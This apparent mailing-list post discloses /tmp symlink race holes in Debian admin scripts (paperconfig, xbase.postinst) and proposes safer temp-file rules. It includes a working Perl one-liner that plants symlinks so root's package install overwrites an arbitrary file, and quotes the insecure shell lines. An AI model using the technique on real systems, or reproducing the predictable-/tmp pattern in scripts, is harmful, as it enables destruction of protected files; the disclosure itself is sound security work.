
Insecure admin scripts with /tmp temp files



There are several administrative programs that use temporary files in /tmp
without proper checking, resulting in major security holes. To make
problems worse, many packages have {post,pre}{inst,rm} scripts with the
same holes.

For example, /usr/sbin/paperconfig: a malicious user can destroy any file
by creating symbolic links in /tmp/.papersize.[$$..$$+100]. Now he only has
to wait for an unsuspecting superuser to run paperconfig, which does not
check the temp files it creates before writing to them. Line 97:
    if echo "$1" >/tmp/.papersize.$$

Another example of a postinst script security hole is in xbase.postinst,
caused by lines 131-132:
    sed /^xbase-not-configured/d /etc/X11/config >/tmp/config.$$
    mv /tmp/config.$$ /etc/X11/config

You can demonstrate the hole as follows:

As superuser, do
# echo 'do not mangle'> /precious
# chmod 600 /precious

Think of /precious as /dev/hd*, /etc/passwd etc.

As normal user, do
    perl -e 'foreach $i ($$..$$+200) {symlink("/precious", "/tmp/config.$i");}'

This creates a few symlinks in /tmp.

Now, as superuser, do
# dpkg -i xbase_3.3-3.deb
# cat /precious 
no-xdm-start-server
no-start-xdm
# ls -l /etc/X11/config 
lrwxrwxrwx   1 tom      tom             9 Jul 31 12:00 /etc/X11/config -> /precious

Horrible!

To clean up, do
# rm /etc/X11/config 
# mv /precious /etc/X11/config
# rm /tmp/config.*


Maybe there should be a set of rules for using temp files in security
critical applications (perhaps in Developers manual or Policy manual). Here
are a few suggestions:

1. Setuid programs and programs run only under a privileged uid (daemons,
admin tools) should not use publicly writable directories for temp files;
instead they should use a dedicated directory accessible only to that uid.
For cases like paperconfig, where the temporary file will ultimately
replace a config file in /etc, /etc/*.conf.new might be a good choice.
There's a new problem though: deleting leftover files.

2. Temp files should be created with mode 600. Read access can also be
harmful.

3. A clueful superuser might want to use the TMPDIR environment variable,
pointing to a secure place for temp files. If temp files are created with
libc tempnam(), this is used automatically.

One could do clever tricks to check if the temp file does not exist, but I
think this is just asking for race condition, NFS, etc. problems.
In C, you can use O_EXCL.

-Topi


-- 
Topi Miettinen  Off-World Colonies- the chance  Hatanpaanvaltatie 18
Project Manager	to begin again in a golden land FIN-33100 Tampere
Telecom Finland	of opportunity and adventure    Finland, Europe


